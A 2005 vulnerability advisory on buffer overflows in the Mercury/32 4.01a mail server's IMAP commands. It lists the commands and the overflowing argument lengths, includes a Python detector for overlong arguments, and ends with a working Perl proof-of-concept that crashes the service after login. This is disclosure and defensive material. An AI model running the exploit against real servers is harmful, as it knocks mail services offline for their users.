Mercury Mail Multiple Buffer Overflows
Source: http://www.pmail.com/patches.htm Author: Reed Published: 2005-09-14

Summary
Mercury is "a free, standards-based mail server solution, providing comprehensive, fast server support for all major Internet e-mail protocols. It is supplied in two versions, one hosted on Windows systems, the other running as a set of NLMs on Novell NetWare file servers".

An authenticated user can trigger several buffer overflows and possibly run arbitrary code on the Mercury Mail server.

Credit:
The information has been provided by Reed Arvin.

Details
Vulnerable Systems:
* Mercury/32 version 4.01a

Immune Systems:
* Mercury/32 version 4.01b and later

There are 14 vulnerable commands that can be used to cause buffer overflows. After a successful login to the mail server, if any of these commands is used with an overly long argument, the application closes, resulting in a denial of service.

The commands and approximate argument lengths are as follows:
EXAMINE A x 512 \r\n
SUBSCRIBE A x 512 \r\n
STATUS A x 512 \r\n
APPEND A x 512 \r\n
CHECK A x 512 \r\n
CLOSE A x 512 \r\n
EXPUNGE A x 512 \r\n
FETCH A x 512 \r\n
RENAME A x 768 \r\n
DELETE A x 768 \r\n
LIST A x 768 \r\n
SEARCH A x 768 \r\n
CREATE A x 1024 \r\n
UNSUBSCRIBE A x 1024 \r\n
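
As a defensive illustration of the list above, the following added example (not part of the original advisory or of any vendor code) flags client IMAP command lines whose argument length reaches a fraction of the advisory's approximate sizes. The function names, the `margin` parameter and the sample session are assumptions constructed for illustration.

```python
# Added example (not from the advisory): flag IMAP command lines whose
# argument length reaches the approximate sizes listed in the advisory.
import re

# Command -> approximate overflow length, taken from the advisory's list.
THRESHOLDS = {
    **dict.fromkeys(["EXAMINE", "SUBSCRIBE", "STATUS", "APPEND", "CHECK",
                     "CLOSE", "EXPUNGE", "FETCH"], 512),
    **dict.fromkeys(["RENAME", "DELETE", "LIST", "SEARCH"], 768),
    **dict.fromkeys(["CREATE", "UNSUBSCRIBE"], 1024),
}

# IMAP client line: <tag> SP <command> [SP <arguments>]
LINE_RE = re.compile(rb"^(\S+) ([A-Za-z]+)(?: (.*))?$", re.DOTALL)

def check_line(raw: bytes, margin: float = 0.5):
    """Return (tag, command, arg_len) if the line is suspicious, else None.

    margin is an assumed tuning knob: alert at margin * listed length,
    because the advisory calls its lengths approximate.
    """
    m = LINE_RE.match(raw.rstrip(b"\r\n"))
    if not m:
        return None
    tag, cmd, args = m.group(1), m.group(2).upper().decode(), m.group(3) or b""
    limit = THRESHOLDS.get(cmd)
    if limit is not None and len(args) >= limit * margin:
        return tag.decode(errors="replace"), cmd, len(args)
    return None

def scan(lines, margin: float = 0.5):
    return [hit for hit in (check_line(l, margin) for l in lines) if hit]

# Constructed sample session (client-to-server lines only).
SAMPLE = [
    b"a001 LOGIN alice secret\r\n",
    b"a002 SELECT INBOX\r\n",
    b"a003 LIST \"\" \"*\"\r\n",
    b"a004 CHECK " + b"A" * 512 + b"\r\n",
    b"a005 create " + b"B" * 600 + b"\r\n",
    b"a006 FETCH 1:* (FLAGS)\r\n",
]

if __name__ == "__main__":
    for tag, cmd, n in scan(SAMPLE):
        print(f"ALERT tag={tag} cmd={cmd} arg_len={n}")
```

A lower `margin` catches shorter probes at the cost of more false positives on clients that send long but legitimate FETCH or SEARCH arguments.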

Vendor Status:
The vendor was notified and a patch was released to solve the issues. For more details visit the patches page at: http://www.pmail.com/patches.htm

Exploit Code:
#===== Start Mercury32_Overflow.pl =====
#
# Usage: Mercury32_Overflow.pl <ip> <imap4 user> <imap4 pass>
# Mercury32_Overflow.pl 127.0.0.1 hello moto
#
# Mercury/32, v4.01a, Dec 8 2003
#
# Download:
# http://www.pmail.com/
#
###########################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                    PeerPort => "143",
                                    Proto    => "TCP"))
{
    print "Attempting to kill Mercury/32 service at $ARGV[0]:143...";

    sleep(1);

    print $socket "0000 LOGIN $ARGV[1] $ARGV[2]\r\n";

    sleep(1);

    print $socket "0001 CHECK " . "A" x 512 . "\r\n";

    close($socket);

    sleep(1);

    if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                        PeerPort => "143",
                                        Proto    => "TCP"))
    {
        close($socket);

        print "failed!\n";
    }
    else
    {
        print "successful!\n";
    }
}
else
{
    print "Cannot connect to $ARGV[0]:143\n";
}
#===== End Mercury32_Overflow.pl =====
